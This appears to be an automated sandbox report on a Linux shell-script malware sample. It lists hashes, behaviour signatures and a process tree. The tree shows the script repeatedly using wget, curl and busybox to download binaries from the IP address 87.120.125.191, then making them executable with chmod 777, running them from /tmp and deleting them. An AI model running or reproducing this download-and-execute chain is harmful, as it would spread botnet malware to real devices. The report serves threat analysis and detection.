Analysis
-
max time kernel
89s -
max time network
92s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
21/11/2024, 04:06
Static task
static1
Behavioral task
behavioral1
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
-
Size
10KB
-
MD5
2c8ee73ff481383ca124810fef8653b1
-
SHA1
2f0045a1346635e0b97b189a217d60329572ee9c
-
SHA256
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94
-
SHA512
a4cf9a0c5f3fcb4bbc802490023c07e2cdfe73a8a6d3d4903e7e952967325270f6f4a0bf912b58844b8655e30ba7832a39dc377a73ed4443b77740b6584ad8ad
-
SSDEEP
192:mrPM5ZTjn81dBLvdLvgaD6DGDN2uVFxFxFcj/flNzu7ui07gQ27wgRNKW5z7MUzm:jiC2N2uKu4OxTHC2N2uwCo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh/tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:721
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:741
-
-
/bin/chmodchmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:747
-
-
/bin/chmodchmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:753
-
-
/bin/chmodchmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:756
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:758
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:770
-
-
/bin/chmodchmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:777
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:779
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:783
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:792
-
-
/bin/chmodchmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:801
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:802
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:818
-
-
/bin/chmodchmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:825
-
-
/bin/chmodchmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:829
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:831
-
-
/bin/chmodchmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:835
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:849
-
-
/bin/chmodchmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:856
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:857
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:870
-
-
/bin/chmodchmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:879
-
-
/bin/chmodchmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:885
-
-
/bin/chmodchmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:891
-
-
/bin/chmodchmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:897
-
-
/bin/chmodchmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:903
-
-
/bin/chmodchmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:909
-
-
/bin/chmodchmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:915
-
-
/bin/chmodchmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:921
-
-
/bin/chmodchmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:927
-
-
/bin/chmodchmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:933
-
-
/bin/chmodchmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:939
-
-
/bin/chmodchmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:945
-
-
/bin/chmodchmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:951
-
-
/bin/chmodchmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:957
-
-
/bin/chmodchmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:963
-
-
/bin/chmodchmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:969
-
-
/bin/chmodchmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:972
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:975
-
-
/bin/chmodchmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:978
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:979
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:981
-
-
/bin/chmodchmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:984
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97